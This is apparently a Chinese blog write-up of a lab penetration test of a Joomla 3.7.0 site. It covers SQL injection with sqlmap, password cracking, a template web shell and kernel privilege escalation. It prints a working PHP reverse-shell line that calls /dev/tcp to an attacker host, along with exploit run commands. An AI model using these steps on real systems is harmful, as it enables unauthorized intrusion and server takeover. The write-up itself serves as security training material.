记一次对 Joomla CMS 渗透过程

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试评论16,8722字数 265阅读0分53秒阅读模式

首先,对其进行扫描
记一次对 Joomla CMS 渗透过程-图片1
发现其版本为 Joomla 3.7.0

于是,搜索这个版本的漏洞,,,
记一次对 Joomla CMS 渗透过程-图片2
发现存在SQL注入漏洞,继续查看详情
记一次对 Joomla CMS 渗透过程-图片2
上sqlmap跑一波,成功爆库。。。
记一次对 Joomla CMS 渗透过程-图片2
接下来,爆表
记一次对 Joomla CMS 渗透过程-图片2
爆用户名密码
记一次对 Joomla CMS 渗透过程-图片2
在线跑了一下MD5,实在是跑不出来,接下来试试John破解
记一次对 Joomla CMS 渗透过程-图片2
成功破解,得到密码,登录后台,进入模板写入一句话
访问:http://10.1.1.104/templates/protostar/shell.php 没有问题,菜刀连接
记一次对 Joomla CMS 渗透过程-图片2
查看权限,发现不是root
记一次对 Joomla CMS 渗透过程-图片2
接下来进行提权,首先我们查看系统版本,发现是Linux 4.4.0,查找一个这个版本的漏洞
试了好几个都不行,发现这个可以
记一次对 Joomla CMS 渗透过程-图片2
好,我们上传exp
记一次对 Joomla CMS 渗透过程-图片2
提权、、、、菜刀不好用,写一个反弹PHP文件,反弹回来一个shell
记一次对 Joomla CMS 渗透过程-图片2

<?php system("bash -c 'bash -i >& /dev/tcp/10.1.1.103/7777 0>&1'"); ?>

本地监听 7777 然后访问:http://10.1.1.104/templates/protostar/cmd.php成功反弹shell
记一次对 Joomla CMS 渗透过程-图片3
接着继续提权、、、运行如下两个文件

./compile.sh ./doubleput

记一次对 Joomla CMS 渗透过程-图片4
OK,提权成功。。。

http://www.oniont.cn/index.php/archives/250.html

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
OnionT@KillBoy
匿名

发表评论

匿名网友

拖动滑块以完成验证